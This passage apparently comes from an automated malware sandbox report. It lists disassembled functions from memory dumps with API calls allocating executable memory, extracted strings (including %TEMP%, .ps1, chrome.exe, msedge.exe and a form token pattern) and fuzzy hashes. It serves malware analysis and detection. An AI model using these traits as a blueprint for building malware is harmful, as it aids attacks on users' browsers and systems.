NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079158F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007915C3

Strings

l!H, xrefs: 0079152D
l!H, xrefs: 007915A8

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: l!H$l!H
API String ID: 292159236-4010601112
Opcode ID: d95a88634a5b4d196f694c94f7715e69a174116eeb2f4121c162bb3f4e90bde5
Instruction ID: 331ff3983578859ca481fb0b3152d10beb01d99ea6be42e60cdcb5eaf8435560
Opcode Fuzzy Hash: d95a88634a5b4d196f694c94f7715e69a174116eeb2f4121c162bb3f4e90bde5
Instruction Fuzzy Hash: 6151D6301442D09FCF01CF78AC597A63FF0A76A310B0944BFE899CB7A2CA749585DB69

Function 0078E387 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0078E55F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0078E593

Strings

`!H, xrefs: 0078E4FD
`!H, xrefs: 0078E577

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: `!H$`!H
API String ID: 292159236-565606792
Opcode ID: 578d3672f801068b6b2a1d4f1da5ba7e0d5fe6a1786e20f7bfb3aec09c2104c6
Instruction ID: 7d4c553a8868144227ec3a9b517859c99a20a0815e572cf590e8b800490acbd8
Opcode Fuzzy Hash: 578d3672f801068b6b2a1d4f1da5ba7e0d5fe6a1786e20f7bfb3aec09c2104c6
Instruction Fuzzy Hash: B751A97010D3D09FC712CF78AE406A93FF1EB1E310B9544BAE6988B3A2D2749585DB69

Function 007A4447 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 157nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A461F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A465A

Strings

@(H, xrefs: 007A45BD
@(H, xrefs: 007A4632

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: @(H$@(H
API String ID: 292159236-546040949
Opcode ID: cbe709b5a5832fc5e0e6e60df6a39a2799c32c34710c5f9a495b179c9c76288e
Instruction ID: 79105714b523192d923a48a99cb23524f3afb5ab17295a2e12dd81f019f657c9
Opcode Fuzzy Hash: cbe709b5a5832fc5e0e6e60df6a39a2799c32c34710c5f9a495b179c9c76288e
Instruction Fuzzy Hash: D751A4706042909FCB11CF78AC416A73FF4AB7A310F19417AE4DC8B2A2C2759689DB79

Function 007A3167 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 156nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A333F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A3374

Strings

((H, xrefs: 007A32DD
((H, xrefs: 007A3358

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: ((H$((H
API String ID: 292159236-3726013551
Opcode ID: 9ab19cb51e83623c5e83f4907fdbd7c807d1b4732659da8106db8674c67e8a69
Instruction ID: 6fe3605e61237a59a580feacc3422254a8fd0e598d8cccd691ce776d89686252
Opcode Fuzzy Hash: 9ab19cb51e83623c5e83f4907fdbd7c807d1b4732659da8106db8674c67e8a69
Instruction Fuzzy Hash: CD51A7745152D19FCB11CF78AC506A63FF0A75B310B1841BAE8988F3A3C2359689DBA9

Function 007A0AD7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A0CAF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A0CDE

Strings

#H, xrefs: 007A0C4D
#H, xrefs: 007A0CC2

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: #H$#H
API String ID: 292159236-1627510074
Opcode ID: 22a063ee9cfaf9687a06337ea285cac12854b57cd12183167d47ce8725ebd8d9
Instruction ID: eb36de376011ee572c52e068781a240b7cfdeb4099a5222cb4350d6be7b8ec3d
Opcode Fuzzy Hash: 22a063ee9cfaf9687a06337ea285cac12854b57cd12183167d47ce8725ebd8d9
Instruction Fuzzy Hash: 1C51A9716052D09FC721CF38AC906A97FF2B75B310B14457EE8989B3E2C2349685DB69

Function 007A2BF7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A2DC4
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A2E06

Strings

(H (H, xrefs: 007A2DDF
(H, xrefs: 007A2E0E

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: (H$ (H (H
API String ID: 292159236-3789471491
Opcode ID: cfa9515b61953420c96f8dd4f64e01773a0d28440bb3b159d1613e10c133c5e1
Instruction ID: 1f661099e284a349c1fd1e961ac88c4793d8526cf0476d14fee6dadacdb963ae
Opcode Fuzzy Hash: cfa9515b61953420c96f8dd4f64e01773a0d28440bb3b159d1613e10c133c5e1
Instruction Fuzzy Hash: AE51D6381096D09FCB01CF78BC516A53FF4AB5A310F1841FAE9AC5B2E3C2264589DB79

Function 007A3D87 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 153nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A3F5C
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A3F94

Strings

8(H, xrefs: 007A3F9C
8(H, xrefs: 007A3F6F

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: 8(H$8(H
API String ID: 292159236-2783857617
Opcode ID: 6d48c3e1e097864a83d58115e7b122aaa4fd38d156e577b2603b69c71013f19d
Instruction ID: 9fec0c8886d8f07612ca237f59a74521b5199dfbb66151f620f05d560a76c563
Opcode Fuzzy Hash: 6d48c3e1e097864a83d58115e7b122aaa4fd38d156e577b2603b69c71013f19d
Instruction Fuzzy Hash: 8751BE701092E19FCB018F69BC505A73FF4E76B311B18817AE8A85B3E3C2344689DB79

Function 00764C96 Relevance: 7.1, Strings: 5, Instructions: 842COMMON

Download Yara Rule

Strings

n[R, xrefs: 00764DBA
n[R, xrefs: 007654F6
N7R, xrefs: 0076500A
N7R, xrefs: 0076577C
lG, xrefs: 00765B22

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: N7R$N7R$lG$n[R$n[R
API String ID: 0-1547658646
Opcode ID: bd8cd49e501a92727a20c6e6481543b834b132b12b5d8f84ad9c0c6c4e006fec
Instruction ID: 7d43e97beaf10dd241c542a2bf3fca4b63e8c24b527479267c47e933462aeb7a
Opcode Fuzzy Hash: bd8cd49e501a92727a20c6e6481543b834b132b12b5d8f84ad9c0c6c4e006fec
Instruction Fuzzy Hash: A6A2B9B5A01B018FD358CF26C584B92FBE6BF98310F5686AEC55D8B722C770A851CF94

Function 0076E127 Relevance: 6.6, Strings: 5, Instructions: 375COMMON

Download Yara Rule

Strings

msedge.exe, xrefs: 0076E2B0, 0076E6B8
.exe, xrefs: 0076E233, 0076E648
.ps1, xrefs: 0076E1B5, 0076E5CA
%TEMP%, xrefs: 0076E4A3, 0076E8C6
chrome.exe, xrefs: 0076E3A8, 0076E7CB

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: %TEMP%$.exe$.ps1$chrome.exe$msedge.exe
API String ID: 0-1101990917
Opcode ID: 035b9c0ff4abf1a91140eb12805938c1e5cdc58014d2ff2cd5db00cf2598f190
Instruction ID: 39b6e33aa7c943e5f82bc07bf867869abbcbbfed8f14b32239384c5df7f64254
Opcode Fuzzy Hash: 035b9c0ff4abf1a91140eb12805938c1e5cdc58014d2ff2cd5db00cf2598f190
Instruction Fuzzy Hash: 4902C02012860582D3189B61FCA19763362EF997057459A3ED243CBAB4FBFD12C2D79F

Function 0079D667 Relevance: 6.4, APIs: 4, Instructions: 403nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00100000,00003000,00000004), ref: 0079D6B7
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079D777
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0079D79F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079DB5E

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 0ac4684a03b0307293dac91a5be60cbc1c8f67489e4bfba2a3f7974637506276
Instruction ID: 62dfb6f691b36a174165a2fd69d88c7a0a216bcf10fa8c92ab70ee61c02dfbe5
Opcode Fuzzy Hash: 0ac4684a03b0307293dac91a5be60cbc1c8f67489e4bfba2a3f7974637506276
Instruction Fuzzy Hash: CAE1E0755083919FCB20CF29C880A1AFBE1AF95324F588A6DF4E487392D775EC45CB92

Function 007A2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A2B6F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A2BA7

Strings

S{w, xrefs: 007A295C

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: S{w
API String ID: 292159236-2467368281
Opcode ID: 4ccebfe1c6aaa3466f8e960f67e5b663c81b53bfcda1d87f65c9329c77726a64
Instruction ID: 60d59c81841ff77545bc4414e450eab827dbb4c13475bd7bed2831ef459f42ee
Opcode Fuzzy Hash: 4ccebfe1c6aaa3466f8e960f67e5b663c81b53bfcda1d87f65c9329c77726a64
Instruction Fuzzy Hash: 806118792052C18FDB118F389C506E63FF0EB56320B0445F9D8989B3E3C23A968BDB25

Function 0076EB87 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00481CA4,00003000,00000040), ref: 0076ED8B
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0076EDD5

Strings

,, xrefs: 0076ED66

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: ,
API String ID: 292159236-3772416878
Opcode ID: 44d29c9417d3c4fbae533304d9e1e161ddd7e6cae098379819b29a755376e357
Instruction ID: 7cdbf80c3c44f5559239c9f6aad7966498ec66e986336d90fe9d12a7f8dc9ef0
Opcode Fuzzy Hash: 44d29c9417d3c4fbae533304d9e1e161ddd7e6cae098379819b29a755376e357
Instruction Fuzzy Hash: F061BA705082949FDB018F789C506EA3FF0E71A310F04406DE994DB3A2DFB49786DBAA

Function 007915D7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007917BC
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007917F0

Strings

p!H, xrefs: 007917F8

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: p!H
API String ID: 292159236-1596484867
Opcode ID: 849b63d41170a2aa8fc810ca4b53fb3597f9e526c6da0447709002c3546061c2
Instruction ID: f5e4fc0405aac9843815a664fd0010df8b40a63cf6f96910df1762d5f2576981
Opcode Fuzzy Hash: 849b63d41170a2aa8fc810ca4b53fb3597f9e526c6da0447709002c3546061c2
Instruction Fuzzy Hash: F751F9B41492D09FCB01CF79AD586A23FF1D71F310B08456EF4988B3E2CA246985DB6C

Function 00783717 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007838FF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0078392B

Strings

<!H, xrefs: 0078389D

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: <!H
API String ID: 292159236-648550823
Opcode ID: 80aca54bdd97df83f7fcb16d16c73afd1d2524010ac8f0289d088af0abda4fe5
Instruction ID: 7472ce15bb2b6391a7e581290dd3f09c63e2541ede7d127855f10232410ca0e9
Opcode Fuzzy Hash: 80aca54bdd97df83f7fcb16d16c73afd1d2524010ac8f0289d088af0abda4fe5
Instruction Fuzzy Hash: E251DA305042D09FC711CF78AC506B63FF8A79B320B15417AEAA9DB3A2C3749685DB69

Function 00777797 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 164nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0077796C
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007779B3

Strings

,, xrefs: 00777947

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: ,
API String ID: 292159236-3772416878
Opcode ID: f8f91dd21b87cbcc0d961030c6b7e3a513220174cd37d6215f4a72d4dc71f085
Instruction ID: 404e50cb7c4266f83f7f60fe6ee81a949066d2c7e8d5a46e90984f735bceaa1a
Opcode Fuzzy Hash: f8f91dd21b87cbcc0d961030c6b7e3a513220174cd37d6215f4a72d4dc71f085
Instruction Fuzzy Hash: 2451B7701092D0FFCB198F6CAC50AB53FF1979F311B18426AE59E9B2F3C2244581DB69

Function 00451140 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 162nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00451328
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0045135C

Strings

K, xrefs: 00451230

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: K
API String ID: 292159236-3871443992
Opcode ID: d95a88634a5b4d196f694c94f7715e69a174116eeb2f4121c162bb3f4e90bde5
Instruction ID: 6b3405e511feca26f760bdad0cd7720e2c786d5ad1b8363769086086e0459b6d
Opcode Fuzzy Hash: d95a88634a5b4d196f694c94f7715e69a174116eeb2f4121c162bb3f4e90bde5
Instruction Fuzzy Hash: D151B4301442909FDB01CF789C597A73FF0A76A311B0845BFE898DB7A3CA249589DB69

Function 0045A160 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0045A338
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0045A373

Strings

*dKS, xrefs: 0045A247

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: *dKS
API String ID: 292159236-1090151738
Opcode ID: a2fe49f9913a3f9966272d2c94832c324c49b4afe83727c93b78a014842e7d55
Instruction ID: fa75b8a9424ee424930a8e52b75f11cf51cab345910f1cd1dc496571a340f40b
Opcode Fuzzy Hash: a2fe49f9913a3f9966272d2c94832c324c49b4afe83727c93b78a014842e7d55
Instruction Fuzzy Hash: BA51AA301043D09FC715CF78AC517A63FF0EB9B311B1481BAE8989B3A2D3359585DBA9

Function 0079E32F Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

*kHF, xrefs: 0079E58D
E@f, xrefs: 0079E576
E@f, xrefs: 0079E3C2
*kHF, xrefs: 0079E3DC

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: *kHF$*kHF$E@f$E@f
API String ID: 0-4022239192
Opcode ID: 9cf77a3ac20636eade31cf76363d5cf6ba8410991192d74b3a08db24084198f2
Instruction ID: 1fd4d9ed5ab6055fd332698fc40741f955957cb1c2f28a648f5d409d36f4184e
Opcode Fuzzy Hash: 9cf77a3ac20636eade31cf76363d5cf6ba8410991192d74b3a08db24084198f2
Instruction Fuzzy Hash: FCD14CB4904B008FD368CF19D5A0812FBF2BF99310755896ED88A8BB61DB71F845CF54

Function 0045E0C8 Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

*kHF, xrefs: 0045E326
*kHF, xrefs: 0045E175
E@f, xrefs: 0045E15B
E@f, xrefs: 0045E30F

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: *kHF$*kHF$E@f$E@f
API String ID: 0-4022239192
Opcode ID: 9cf77a3ac20636eade31cf76363d5cf6ba8410991192d74b3a08db24084198f2
Instruction ID: 17c8dceaec839ec3b1b936905fe0e65f46c9f90b6c271deedf9959d34d78a3da
Opcode Fuzzy Hash: 9cf77a3ac20636eade31cf76363d5cf6ba8410991192d74b3a08db24084198f2
Instruction Fuzzy Hash: C3D14BB4904B008FC368CF19E590822FBF2BF98314355896EE88A8BB61DB70F845CF54

Function 00763B07 Relevance: 4.4, Strings: 3, Instructions: 644COMMON

Download Yara Rule

Strings

_2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/api, xrefs: 007643AC
name="atok" value=", xrefs: 00763B2E, 00764282
act=life, xrefs: 00763C6A, 00763D70

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: _2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/api$act=life$name="atok" value="
API String ID: 0-102919772
Opcode ID: c0e59eac6a0bb9715b225b1c1c2f2a41798097a0d4f1c4fc7de795d8fcf5fa08
Instruction ID: f4ecb31e9832c6954e02ab6dec5e68c0c067c90b4c667361e421a4f4a5db2d93
Opcode Fuzzy Hash: c0e59eac6a0bb9715b225b1c1c2f2a41798097a0d4f1c4fc7de795d8fcf5fa08
Instruction Fuzzy Hash: F2523770600B408FC320CF2AC890652BBF1BF5A310B55896ED8EA9B762E774F845CF56

Function 0078B4F7 Relevance: 4.2, Strings: 1, Instructions: 2917COMMON

Download Yara Rule

Strings

0, xrefs: 0078E2AA

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0986dfdcee927b1f72bed0fc5dd6c719435d8445e674e2b5960c4999a3b72e3d
Instruction ID: eaa03a1ab51c5fac29f65f0ce63e62ff20055fc5941ca4664d2e7a5e64bfde4e
Opcode Fuzzy Hash: 0986dfdcee927b1f72bed0fc5dd6c719435d8445e674e2b5960c4999a3b72e3d
Instruction Fuzzy Hash: A343F94010E2D19EEB138BB53C610F63FF14A2B2157D954F6D1E88A6A3C44847CAEB7E

Function 0044B290 Relevance: 4.2, Strings: 1, Instructions: 2917COMMON

Download Yara Rule

Strings

0, xrefs: 0044E043

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0986dfdcee927b1f72bed0fc5dd6c719435d8445e674e2b5960c4999a3b72e3d
Instruction ID: 2a48f5c06f6b23289121aab2226055e079ab37820a06a9ebd77e6d6610537fe0
Opcode Fuzzy Hash: 0986dfdcee927b1f72bed0fc5dd6c719435d8445e674e2b5960c4999a3b72e3d
Instruction Fuzzy Hash: 4A43E94010E2D19EEB138BB53C610F63FF14A2B2157D954F6D1E88A6A3C44857CAEB7E

Function 00791807 Relevance: 4.2, Strings: 1, Instructions: 2915COMMON

Download Yara Rule

Strings

0, xrefs: 0079458A

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8896419988e41fd97617a24552f30764c5e7e025505267983ccd42156c727958
Instruction ID: 43741c6e03b7de17928d16e1ec9676bac54d3a02fa9bac180b649e39299bc983
Opcode Fuzzy Hash: 8896419988e41fd97617a24552f30764c5e7e025505267983ccd42156c727958
Instruction Fuzzy Hash: 0243B96019E2D09EDB1387B53C690E63FF1453B21174914BEE5EC8A2A3C94847CAE77E

Function 0078E5A7 Relevance: 4.1, Strings: 1, Instructions: 2869COMMON

Download Yara Rule

Strings

0, xrefs: 007912CA

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cd425212c2fede07f0d2bb9425cdf695ddc1f2df95ebaf66fab312a1893b230b
Instruction ID: facc0d8922c3f94b073c0f5a9f737cbd7eb41654dfadeddaac4a4e06c565f425
Opcode Fuzzy Hash: cd425212c2fede07f0d2bb9425cdf695ddc1f2df95ebaf66fab312a1893b230b
Instruction Fuzzy Hash: CB43AA3018D6D19DDB0287793D690F63FF1952B21278954EED4EC8A6A3D84843CAE73E

Function 0044E340 Relevance: 4.1, Strings: 1, Instructions: 2869COMMON

Download Yara Rule

Strings

0, xrefs: 00451063

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cd425212c2fede07f0d2bb9425cdf695ddc1f2df95ebaf66fab312a1893b230b
Instruction ID: 5392efd611a2c7f92f94bcab9d14f8cfe9416b5fd183275f0815dfe27c373a41
Opcode Fuzzy Hash: cd425212c2fede07f0d2bb9425cdf695ddc1f2df95ebaf66fab312a1893b230b
Instruction Fuzzy Hash: 0D43AA3018D6D19DDB0287793D690F63FF1952B21278954EED4EC8A6A3D84843CAE73E

Function 0078A494 Relevance: 4.1, Strings: 3, Instructions: 325COMMON

Download Yara Rule

Strings

/3l, xrefs: 0078A66B
/3h, xrefs: 0078A702
/3l, xrefs: 0078A554

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: /3h$/3l$/3l
API String ID: 0-919782871
Opcode ID: 8f49f81482ad48e65f09579717d09044b3dd22649227557e1afbd65e6c0806fa
Instruction ID: be94940434dbe7f4afd5ef1d3c476f0c8f1db24fad2b5a432857e8bfc10ec864
Opcode Fuzzy Hash: 8f49f81482ad48e65f09579717d09044b3dd22649227557e1afbd65e6c0806fa
Instruction Fuzzy Hash: CDD117B5900B419FD325CF2AC080612FBF1BF99310B298A6EC49A9BB51D375F846CF91

Function 0044A22D Relevance: 4.1, Strings: 3, Instructions: 325COMMON

Download Yara Rule

Strings

/3l, xrefs: 0044A404
/3h, xrefs: 0044A49B
/3l, xrefs: 0044A2ED

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: /3h$/3l$/3l
API String ID: 0-919782871
Opcode ID: 8f49f81482ad48e65f09579717d09044b3dd22649227557e1afbd65e6c0806fa
Instruction ID: 40e222cdae57fbffc9a9324964e85558614a7d3d1267bb9a0a7ad82185a8766f
Opcode Fuzzy Hash: 8f49f81482ad48e65f09579717d09044b3dd22649227557e1afbd65e6c0806fa
Instruction Fuzzy Hash: C1D128B5900B418FE325CF2AC080612FBF1BF99314B258A5EC89A9BB51C375F856CF95

Function 00765E6E Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

0AI, xrefs: 007660EE
d(), xrefs: 00765F32
>ZF, xrefs: 00766062

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: 0AI$>ZF$d()
API String ID: 0-258115593
